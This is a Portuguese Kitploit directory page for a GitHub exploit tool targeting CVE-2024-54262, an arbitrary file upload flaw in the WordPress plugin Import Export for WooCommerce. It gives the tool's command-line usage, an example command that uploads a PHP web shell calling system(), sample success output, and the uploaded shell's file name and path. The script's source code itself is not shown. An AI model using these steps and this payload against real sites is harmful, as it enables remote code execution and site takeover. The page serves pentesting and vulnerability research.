Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-54262 — Exploit CVE-2024-54262: Upload arbitrário de arquivo no Import Export for WooCommerce | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2024-54262
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubnxploited/cve-2024-54262

CVE-2024-54262

Exploit CVE-2024-54262: Upload arbitrário de arquivo no Import Export for WooCommerce

Ver Repositório
4há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-54262

Explorar CVE-2024-54262: Upload Arbitrário de Ficheiros no Import Export for WooCommerce

Visão Geral

Este script explora uma vulnerabilidade no plugin WordPress "Import Export for WooCommerce". A vulnerabilidade permite que utilizadores não autorizados façam upload de ficheiros arbitrários, levando a potencial execução remota de código (RCE).

Funcionalidades:

  • Detecção de Versão: Verifica automaticamente se o site WordPress está a executar uma versão vulnerável do plugin.
  • Autenticação: Suporta login no WordPress para exploração adicional.
  • Upload de Ficheiros: Permite o upload de ficheiros PHP maliciosos para RCE.

Pré-requisitos:

  1. Python 3.x
  2. Bibliotecas Python necessárias:
    • requests
    • argparse

Instale as dependências usando:

root@kitploit:~
pip install requests
  1. Garanta que o site WordPress alvo utiliza a versão vulnerável do plugin.

Uso:

root@kitploit:~
usage: CVE-2024-54262.py [-h] --url URL --username USERNAME --password PASSWORD [--command COMMAND]

Exploit CVE-2024-54262: Arbitrary File Upload in Import Export for WooCommerce

options:
  -h, --help            show this help message and exit
  --url URL, -u URL     Base URL of the WordPress site
  --username USERNAME, -un USERNAME
                        Username for login
  --password PASSWORD, -p PASSWORD
                        Password for login
  --command COMMAND, -c COMMAND
                        PHP shell code to upload

Exemplo:

root@kitploit:~
 CVE-2024-54262.py --url https://example.com --username admin --password admin --command "<?php system('ls'); ?>"

Explicação da Saída

  1. O site está vulnerável.
    • Indica que o site WordPress está a executar uma versão vulnerável do plugin.
  2. Autenticado com sucesso.
    • Confirma o login bem-sucedido com as credenciais fornecidas.
  3. root@kitploit:~
    {
        "status": true,
        "code": 104,
        "message": "Success",
        "data": {
            "file_name": "import_manual_1737090262.php",
            "total_requests": 1,
            "import_columns": "all",
            "product_search_type": "SKU",
            "product_operation": "create_new_update_existing",
            "field_separator": ","
        }
    }
    
    
    
  • Nome do Shell: import_manual_1737090262.php
  • Caminho do Shell: wp-content/uploads/import-export-for-woocommerce/product/

Aviso Legal

Esta ferramenta é apenas para fins educacionais. O autor não é responsável por qualquer uso indevido ou danos causados por este script. O acesso não autorizado ou a exploração de sistemas sem permissão explícita é ilegal e antiético.

Baixar ferramenta